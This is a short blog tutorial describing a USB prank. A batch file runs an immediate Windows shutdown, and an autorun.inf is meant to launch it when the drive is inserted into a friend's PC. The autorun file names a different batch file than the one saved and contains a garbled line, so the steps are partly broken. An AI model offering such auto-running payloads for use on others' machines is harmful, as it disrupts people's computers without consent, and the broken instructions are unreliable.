How to turn off your pc/lap by using Pendrive

Normally, we turn off the computer or laptop through continuous by pressing or holding the power button for a few seconds, you may be able to stop the computer with a USB stick. Only Notepad Tricks can use on a USB stick, and the same technique to the PC / laptop by writing it in the batch file.
The system turns off when the flash drive to your PC or laptop. it's just surprising you and your friends with this simple tip used.

Follow the steps below:

  • Open the notepad, and copy + paste following codes in notepad.
@echo off
shutdown -s -t 00

-s : shutdown.
-r : Restart.
-l : Logoff.
-t : Time(After how many seconds should PC turn off).
-a : aborting the shutdown of PC

  • 00 is indicating that system will shut down after 0 seconds.You change the timing in the desired seconds.
  • Now click on “File” and then “Save” to save the file or just simply click the ctrl+S, save the file in shutdown.bat.(you must save in .bat extension file indicating the batch file.
  • Now again open the notepad and copy the code given below :

[autorun]
Open=game.bat
Action=Mouse DisableSave it as “autorun.inf”
  • Then copy the two files in your pen drive, Just finished, whenever you insert his pen drive,the system will be turned off automatically.

NOTE;-  This tutorial is only for Education purpose I am not responsible for any kind of crack, hack, and security damage.

No comments:

Powered by Blogger.